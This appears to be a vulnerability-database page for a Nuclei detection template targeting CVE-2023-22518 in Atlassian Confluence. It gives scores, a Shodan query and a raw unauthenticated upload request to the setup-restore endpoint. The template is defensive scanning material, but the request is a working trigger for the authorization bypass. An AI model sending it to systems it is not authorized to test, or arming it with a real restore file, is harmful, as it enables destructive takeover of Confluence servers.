Atlassian Confluence Server - Improper Authorization

2023-11-0218:36:47

ProjectDiscovery

github.com

cve2023

atlassian

confluence

rce

unauth

intrusive

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.966 High

EPSS

Percentile

99.6%

JSON

All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.

id: CVE-2023-22518

info:
  name: Atlassian Confluence Server - Improper Authorization
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.
    Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
  reference:
    - https://confluence.atlassian.com/pages/viewpage.action?pageId=1311473907
    - https://blog.projectdiscovery.io/atlassian-confluence-auth-bypass/
    - https://jira.atlassian.com/browse/CONFSERVER-93142
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22518
    - https://github.com/RootUp/PersonalStuff/blob/master/check_cve_2023_22518.py
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-22518
    cwe-id: CWE-863
    epss-score: 0.97011
    epss-percentile: 0.99725
    cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: atlassian
    product: confluence_data_center
    shodan-query: http.component:"Atlassian Confluence"
    note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts.
  tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev

http:
  - raw:
      - |
        POST /json/setup-restore.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7
        X-Atlassian-Token: no-check

        ------WebKitFormBoundaryT3yekvo0rGaL9QR7
        Content-Disposition: form-data; name="buildIndex"

        false
        ------WebKitFormBoundaryT3yekvo0rGaL9QR7
        Content-Disposition: form-data; name="file";filename="{{randstr}}.zip"

        {{randstr}}
        ------WebKitFormBoundaryT3yekvo0rGaL9QR7
        Content-Disposition: form-data; name="edit"

        Upload and import
        ------WebKitFormBoundaryT3yekvo0rGaL9QR7--

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')"
        condition: and
# digest: 4b0a00483046022100bfe2427057a021c02b45e8933fad188130ca08bbb54211b7d88907f02834dce6022100d073c6584b72693b5d1493b8fc4df8ff572a6c26046d83a428f83dfba54cec0a:922c64590222798bb761d5b6d8e72950